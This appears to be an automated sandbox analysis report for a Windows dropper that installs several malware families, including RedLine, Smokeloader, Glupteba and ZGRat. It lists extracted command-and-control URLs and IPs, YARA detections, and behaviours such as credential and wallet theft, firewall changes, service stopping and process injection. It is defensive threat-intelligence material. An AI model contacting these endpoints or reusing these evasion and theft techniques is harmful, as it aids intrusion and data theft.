glupteba | 1278582d6a93ec394a8280a7dfe5851c6bf2383401cbff386448d496f6d53ad7

Analysis

max time kernel
141s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
17-11-2023 22:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.599f6077a82b4742f12f029cbd9060f0.exe
Size

802KB
MD5

599f6077a82b4742f12f029cbd9060f0
SHA1

922ac91594964409ecc57fef522bf2993e5696d4
SHA256

1278582d6a93ec394a8280a7dfe5851c6bf2383401cbff386448d496f6d53ad7
SHA512

1a311290ff703bde1c4e759c06e1d9db7287e3176625204c12f0854ca4a1ed623b84d8dad38fde0a607bff487c3566806c3c40653e902019b6f0ad5508b33469
SSDEEP

24576:NyL0L2UWLqg5UaeuIsKC/GdLYDf95vyjVDVucQ:oL0L2UubNet9EGWHCdVu

Malware Config

Extracted

Family

smokeloader

Version

2022

http://5.42.92.190/fks/index.php

rc4.i32

Extracted

Family

redline

Botnet

pixelfresh

194.49.94.11:80

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

Detect Mystic stealer payload 4 IoCs

resource	yara_rule
behavioral1/memory/1376-36-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/1376-47-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/1376-48-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/1376-50-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family

Detect ZGRat V1 20 IoCs

resource	yara_rule
behavioral1/memory/1536-1395-0x0000000002350000-0x00000000023A2000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1397-0x0000000004A50000-0x0000000004AA0000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1404-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1405-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1409-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1414-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1424-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1429-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1420-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1431-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1436-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1439-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1441-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1444-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1304-1408-0x000002A3FDAC0000-0x000002A3FDBC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1446-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1448-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1450-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1452-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1
behavioral1/memory/1536-1454-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 4 IoCs

resource	yara_rule
behavioral1/memory/6172-1147-0x0000000002EB0000-0x000000000379B000-memory.dmp	family_glupteba
behavioral1/memory/6172-1214-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/6172-1381-0x0000000002EB0000-0x000000000379B000-memory.dmp	family_glupteba
behavioral1/memory/6172-1406-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Mystic
Mystic is an infostealer written in C++.
stealer mystic
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 25 IoCs

resource	yara_rule
behavioral1/memory/7040-863-0x0000000000040000-0x000000000005E000-memory.dmp	family_redline
behavioral1/memory/7204-921-0x0000000000400000-0x0000000000449000-memory.dmp	family_redline
behavioral1/memory/7204-920-0x0000000000450000-0x000000000048E000-memory.dmp	family_redline
behavioral1/memory/6768-929-0x00000000006A0000-0x00000000006FA000-memory.dmp	family_redline
behavioral1/memory/6768-933-0x0000000000400000-0x0000000000470000-memory.dmp	family_redline
behavioral1/memory/1536-1395-0x0000000002350000-0x00000000023A2000-memory.dmp	family_redline
behavioral1/memory/1536-1397-0x0000000004A50000-0x0000000004AA0000-memory.dmp	family_redline
behavioral1/memory/1536-1404-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1405-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1409-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1414-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1424-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/8152-1426-0x00000000007D0000-0x000000000080E000-memory.dmp	family_redline
behavioral1/memory/1536-1429-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1420-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1431-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1436-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1439-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1441-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1444-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1446-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1448-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1450-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1452-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline
behavioral1/memory/1536-1454-0x0000000004A50000-0x0000000004A9A000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/7040-863-0x0000000000040000-0x000000000005E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 7300 created 3252	7300	latestX.exe	44
PID 7300 created 3252	7300	latestX.exe	44
PID 7300 created 3252	7300	latestX.exe	44
PID 7300 created 3252	7300	latestX.exe	44
PID 7300 created 3252	7300	latestX.exe	44
PID 1460 created 3252	1460	updater.exe	44

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
4268	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 19 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1536-1395-0x0000000002350000-0x00000000023A2000-memory.dmp	net_reactor
behavioral1/memory/1536-1397-0x0000000004A50000-0x0000000004AA0000-memory.dmp	net_reactor
behavioral1/memory/1536-1404-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1405-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1409-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1414-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1424-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1429-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1420-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1431-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1436-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1439-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1441-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1444-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1446-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1448-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1450-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1452-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor
behavioral1/memory/1536-1454-0x0000000004A50000-0x0000000004A9A000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	3B8D.exe

Executes dropped EXE 22 IoCs

pid	Process
3012	ps8af17.exe
4596	1tp87II1.exe
1664	2YG1412.exe
5404	3LI13Te.exe
6060	3B8D.exe
7040	3D82.exe
7204	3F29.exe
5260	InstallSetup5.exe
6768	41F9.exe
4912	toolspub2.exe
6172	31839b57a4f11171d6abc8bbc4451ee4.exe
2240	Broom.exe
7300	latestX.exe
5628	toolspub2.exe
2392	923D.exe
6928	EC25.exe
1536	2DB.exe
1304	57C.exe
8152	84B.exe
1460	updater.exe
4568	31839b57a4f11171d6abc8bbc4451ee4.exe
3368	Current.exe

Loads dropped DLL 4 IoCs

pid	Process
7204	3F29.exe
7204	3F29.exe
6768	41F9.exe
6768	41F9.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NEAS.599f6077a82b4742f12f029cbd9060f0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	ps8af17.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000022e15-12.dat	autoit_exe
behavioral1/files/0x0008000000022e15-13.dat	autoit_exe

Detected potential entity reuse from brand paypal.
phishing paypal

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1664 set thread context of 1376	1664	2YG1412.exe	115
PID 4912 set thread context of 5628	4912	toolspub2.exe	189
PID 2392 set thread context of 4248	2392	923D.exe	212
PID 6928 set thread context of 6040	6928	EC25.exe	222

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5320	sc.exe
492	sc.exe
6740	sc.exe
6140	sc.exe
6604	sc.exe
6620	sc.exe
7464	sc.exe
4108	sc.exe
6892	sc.exe
6588	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
5684	1376	WerFault.exe	115
7064	7204	WerFault.exe	176
4152	6768	WerFault.exe	181

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3LI13Te.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3LI13Te.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3LI13Te.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5404	3LI13Te.exe
5404	3LI13Te.exe
5452	msedge.exe
5452	msedge.exe
5472	msedge.exe
5472	msedge.exe
4260	msedge.exe
4260	msedge.exe
3088	msedge.exe
3088	msedge.exe
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
6660	msedge.exe
6660	msedge.exe
3252	Explorer.EXE
3252	Explorer.EXE
6156	msedge.exe
6156	msedge.exe
6724	msedge.exe
6724	msedge.exe
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
5404	3LI13Te.exe
5628	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

pid	Process
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
4260	msedge.exe
1928	msedge.exe
1928	msedge.exe
1928	msedge.exe
